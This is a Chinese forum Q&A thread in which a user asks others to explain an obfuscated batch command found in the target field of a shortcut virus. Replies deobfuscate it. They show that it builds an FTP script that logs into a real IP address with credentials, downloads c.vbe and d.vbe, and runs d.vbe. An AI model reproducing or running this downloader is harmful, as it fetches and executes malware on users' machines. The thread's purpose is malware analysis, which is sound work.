快捷方式病毒的一个小疑点
日期:2014-05-17 浏览次数:20794 次
快捷方式病毒的一个小问题
下面的这段代码是从一个快捷方式病毒的属性 目标 里面提取出来的一段代码
看了一顿貌似是连接一个ftp下载 c.vbe d.vbe 谁能再详细的讲解一下里面的代码 不是很清楚啊。
^>Z>C 是什么意思
%coMSPEc% /c SET f=O 221.231.13&echO %A%%f%8.33^>Z>C&EcHo %a%tw520^>^>z>>C&EcHo %a%123123^>^>Z>>c&eChO %a%GeT c.vbe d.Vbe^>^>z>>c&eCHo %A%by^>^>Z>>C&SeT G=.co&EcHo %B%%S%s:Z>>c&ECho %o%rt d.vbe>>c&SeT S= -&sET B=ftp&SeT a=ECho &ReN c y.BAT&SEt O=sta&y
谢谢。
------解决方案--------------------
下面的这段代码是从一个快捷方式病毒的属性 目标 里面提取出来的一段代码
看了一顿貌似是连接一个ftp下载 c.vbe d.vbe 谁能再详细的讲解一下里面的代码 不是很清楚啊。
^>Z>C 是什么意思
%coMSPEc% /c SET f=O 221.231.13&echO %A%%f%8.33^>Z>C&EcHo %a%tw520^>^>z>>C&EcHo %a%123123^>^>Z>>c&eChO %a%GeT c.vbe d.Vbe^>^>z>>c&eCHo %A%by^>^>Z>>C&SeT G=.co&EcHo %B%%S%s:Z>>c&ECho %o%rt d.vbe>>c&SeT S= -&sET B=ftp&SeT a=ECho &ReN c y.BAT&SEt O=sta&y
谢谢。
------解决方案--------------------
- BatchFile code
set f=o 221.231.13 echo %a%%f%8.33^>z>c echo %a%tw520^>^>z>>c echo %a%123123^>^>z>>c echo %a%get c.vbe d.vbe^>^>z>>c echo %a%by^>^>z>>c set g=.co echo %b%%s%s:z>>c echo %o%rt d.vbe>>c set s= - set b=ftp set a=echo ren c y.bat set o=sta y
------解决方案--------------------
就不能自己动手弄下,大小写转换,&分行,获取echo生成的c,变量替换,有人就喜欢这样绕来绕去
%comspec% /c
set f=o 221.231.13
echo %a%%f%8.33^>z>c
echo %a%tw520^>^>z>>c
echo %a%123123^>^>z>>c
echo %a%get c.vbe d.vbe^>^>z>>c
echo %a%by^>^>z>>c
set g=.co
echo %b%%s%s:z>>c
echo %o%rt d.vbe>>c
set s=-
set b=ftp
set a=echo
ren c y.bat
set o=sta
y
生成z文件,还就是ftp脚本
o 221.231.138.33
tw520
123123
get c.vbe d.vbe
by
调用z文件做事
ftp-s:z
start d.vbe
"^>Z>C 是什么意思",这个用于echo输出,echo xxx >x,不是重定向到x了,如重定向内容中有>就得加转义符
免责声明: 本文仅代表作者个人观点,与爱易网无关。其原创性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容、文字的真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
